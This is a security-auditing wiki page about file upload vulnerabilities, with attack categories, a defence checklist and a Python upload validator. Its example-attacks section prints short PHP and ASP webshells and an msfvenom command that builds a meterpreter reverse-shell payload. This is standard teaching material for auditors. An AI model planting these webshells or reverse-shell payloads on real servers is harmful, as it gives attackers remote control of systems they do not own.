File Upload - TairinySimeonato/WebAuditing GitHub Wiki

First, the attacker needs to upload code into the system. Then, the code needs to be executed somehow. The application should validate both the file extension and the MIME content type. An attacker may try to bypass that protection by adding two file extensions.

There are basically two ways a web application can be attacked by a malicious file upload.

1) Type of file:

A file might be able to overwrite an existing file with the same name on the server. If this is an important file, the new file can cause the web app to malfunction. The new file can also be used to replace a page or edit the application's settings so that further attacks become easier.

2) Content of file:

A file uploaded to a web app can contain malicious code, for example an exploit, which could be used to take control of the server. The file could also contain JavaScript or HTML tags that exploit other vulnerabilities; an HTML file can trigger XSS, for example.

Other ways to attack:

  • Uploading a huge file can exhaust the server's resources.
  • If the uploaded file can be reached through a URL path, it can be executed right after being uploaded.
  • Adding two file extensions
  • Adding spaces or dots into filename

Defense

  • File extension whitelist
  • Validation of user input (for example: do not allow 2 file extensions or space or dots in the filename)
  • Filenames should have a maximum length and files should have a maximum size
  • The directory for uploaded files should be outside the web root
  • Scan the uploaded files before opening them
  • Web app should rename the files
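The list above as one server-side check, written as an added example (not code from this wiki): the filename must have exactly one extension from a whitelist, no spaces or stray dots, and a bounded length; the content is checked against magic bytes for that extension instead of trusting the client's Content-Type; the size is bounded; and the stored name is random. The allowed types, size and length limits are constructed values for the example.

```python
import os
import re
import secrets

# Constructed policy values for this example, not from the wiki page.
ALLOWED = {
    # extension -> magic bytes the content must start with
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "pdf": b"%PDF-",
}
MAX_NAME_LEN = 64
MAX_SIZE = 2 * 1024 * 1024  # 2 MiB

# Base name may contain only letters, digits, '_' and '-': no spaces, no dots.
_SAFE_BASE = re.compile(r"^[A-Za-z0-9_-]+$")


def validate_upload(filename: str, content: bytes) -> str:
    """Return the random server-side filename to store under, or raise ValueError."""
    # Keep only the last path component so a path in the name cannot escape the upload dir.
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or len(name) > MAX_NAME_LEN:
        raise ValueError("bad filename length")
    parts = name.split(".")
    # Exactly one dot: 'shell.php.jpg' and 'shell.jpg.' both fail here.
    if len(parts) != 2:
        raise ValueError("filename must have exactly one extension")
    base, ext = parts
    if not _SAFE_BASE.match(base):
        raise ValueError("filename contains disallowed characters")
    ext = ext.lower()
    if ext not in ALLOWED:
        raise ValueError("extension not in whitelist")
    if len(content) == 0 or len(content) > MAX_SIZE:
        raise ValueError("bad file size")
    # Check the bytes themselves; the client-supplied MIME type is attacker-controlled.
    if not content.startswith(ALLOWED[ext]):
        raise ValueError("content does not match extension")
    # Rename: random token plus the whitelisted extension; the user's name never reaches disk.
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(filename: str, content: bytes) -> bool:
    """Boolean wrapper around validate_upload for quick checks."""
    try:
        validate_upload(filename, content)
        return True
    except ValueError:
        return False
```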

Example attacks

Server-side code attack (RCE)

  • JSP, JSPX, ASP, ASPX, PHP, py

The attacker uploads a webshell.

```php
<?php echo shell_exec($_GET['cmd']); ?> // TODO: update this with working webshell, this may not work.
```

asp

Can be generated with msfvenom.

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
```

```asp
<% eval request("cmd") %>
```

Client-side code attack

  • HTML, HTM, js

Miscellaneous

  • tons of small files - can lead to DoS
  • huge files - file space denial of service
  • file using malicious path or name - overwrite a critical file
  • .exe file - victims download trojaned executable
  • Executables, office documents with virus - machines get infected

Content-Type

```
# images
image/jpeg

# audio

# scripts potentially
application/javascript
text/html
application/xhtml+xml
```

PHP code review

  • start at the "Source"
    • $_FILES

Reports

Resources